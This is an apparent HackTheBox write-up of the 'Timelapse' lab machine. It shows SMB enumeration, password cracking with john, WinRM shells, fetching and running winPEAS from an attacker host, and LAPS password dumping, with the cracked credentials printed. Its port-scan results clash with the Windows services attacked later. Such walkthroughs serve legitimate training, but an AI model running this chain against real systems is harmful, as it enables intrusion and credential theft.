This is a writeup for the Timelapse machine from the HackTheBox site.
Enumeration #
First, let’s start with a scan of our target with the following command:
nmap -sV -T4 -Pn 10.129.188.205
Many TCP ports are discovered:
- 22/tcp : SSH port (OpenSSH 8.2)
- 80/tcp : HTTP web server (Apache 2.4.41)
Exploit #
First I start by listing the SMB shares with the guest account:
enum4linux -a -u "guest" -p "" 10.129.188.205
The Shares folder is available for reading, let’s see what we can find in it:
We find two folders, in one of the two folders we find the file winrm_backup.zip, I download it then I try to unzip it. Problem is that it is protected by a password. Let’s try to crack this password with john. To do so, I start by extracting the hash with the following command:
zip2john winrm_backup.zip > hash
Then I launch the dictionary attack with john with the rockyou dictionary:
Quickly I find that the password is supremelagacy. So now I can unpack the archive. In this archive I find a file with the extension .pfx. These files are used by windows to store certificates in PKCS#12 format. From this file we have the possibility to retrieve the certificate and the private key (cf.
ibm.com). To do so, I use the following commands:
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
Problem: the certificate is also protected by a password. I test the password previously found, but without success. Once again we will have to use john to brute force the password. First I get the hash with the following command:
pfx2john legacyy_dev_auth.pfx > hashbis
Then I launch the dictionary attack with john :
I find the password thuglegacy, I can now extract the private key and the certificate. I then test to connect to the machine with these two files for authentication. For that I use evil-winrm with the following command:
evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u
I now have a shell with the legacyy user and I can get the first flag.
*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt
6a29afecacdabd66d286759e1f1379ff
Privilege escalation #
For the elevation of privilege I start by uploding winPEAS then I execute it :
powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe"
./winPEASx64.exe
In the result of the program, I find that a file containing a command history exists on the machine:
I get it on my machine with the following command:
download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
Looking at the contents of the file I find a user and his password!
Another thing that winPEAS teaches me is that the user svc_deploy has the right to read the LAPS passwords attribute!
The “Local Administrator Password Solution” (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.
So I try to do it with the LAPSDumper script with the following command:
┌──(d3vyce㉿kali)-[~/Documents]
└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb
DC01$:J3V}8QBsB4Q6+jgveai$7}}M
The script finds the administrator password of the machine! I can now connect with the following command:
evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M'
I now have a shell as Administrator and I can retrieve the last flag.
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
09cec1f63345aa18fcf4bd05b9be6714
Recommendations #
To patch this host I think it would be necessary to perform a number of actions:
- Do not allow SMB shares containing important files to be accessed by unidentified users
- Do not use weak passwords to protect certificates
- Do not leave files with clear passwords